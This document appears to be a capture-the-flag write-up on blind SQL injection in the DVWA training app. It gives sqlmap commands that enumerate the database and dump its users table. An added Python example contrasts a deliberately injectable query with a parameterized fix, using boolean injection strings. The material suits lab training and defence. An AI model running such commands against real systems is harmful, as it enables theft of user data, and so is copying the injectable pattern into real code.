DVWA Blind SQLi
A recent event organized by the cyberstars and hosted on the cyberranges platform had this challenge in the web category, which required participants to exploit a blind SQL injection and dump the database.
In a case like this you don't get any query output back after sending a malicious query to the database, so the only option left is to evaluate the server's responses. For example, the sleep() function demonstrates this perfectly.
I used sqlmap in this case, so to dump the tables in dvwa:
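Why the server's responses alone are enough to leak data, and what closes the hole, shown as an added example that is not from the original post or from DVWA's code. It assumes a lookup by id that only answers "exists" or "missing"; the function names, the table contents and the use of sqlite3 in place of MySQL are all assumptions made for illustration.

```python
import sqlite3

def make_db():
    # Constructed stand-in for a users table; sqlite3 replaces MySQL here.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, user TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [(1, "admin"), (2, "user2")])
    return db

def lookup_vulnerable(db, raw_id):
    # The id is pasted into the SQL text, so input can rewrite the WHERE clause.
    query = "SELECT user FROM users WHERE user_id = '" + raw_id + "'"
    try:
        found = db.execute(query).fetchone() is not None
    except sqlite3.Error:
        found = False  # errors are hidden, as on a blind endpoint
    return "exists" if found else "missing"

def lookup_hardened(db, raw_id):
    # Accept only a short, plain ASCII integer, then bind it as a parameter.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return "missing"
    row = db.execute("SELECT user FROM users WHERE user_id = ?",
                     (int(raw_id),)).fetchone()
    return "exists" if row else "missing"

def leaks_condition(lookup):
    # Two inputs that differ only in an appended true/false condition.
    # If the answers differ, the page is a one-bit oracle on that condition.
    db = make_db()
    when_true = lookup(db, "1' AND '1'='1")
    when_false = lookup(db, "1' AND '1'='2")
    return when_true != when_false

if __name__ == "__main__":
    print("vulnerable leaks:", leaks_condition(lookup_vulnerable))
    print("hardened leaks:  ", leaks_condition(lookup_hardened))
```

The hardened lookup returns the same answer for both inputs, so there is no response difference left to evaluate.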
sqlmap -u "http://192.168.125.150/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=takjjumq4qqulljjiptu01c7a2" -p id -D dvwa --tables --dbms=mysql
Change the session ID cookie to your own session ID; you can find it by inspecting the page and clicking on Storage.
Having the tables, as a black hat I am more interested in the users table than the guestbook.
To get the columns in the users table:
sqlmap -u "http://192.168.125.150/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=takjjumq4qqulljjiptu01c7a2" -p id -D dvwa -T users --columns --dbms=mysql
To dump the users' information, use this command:
sqlmap -u "http://192.168.125.150/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=takjjumq4qqulljjiptu01c7a2" -p id -D dvwa -T users -C first_name,failed_login,last_name,user,user_id --dump --dbms=mysql
Happy hacking :)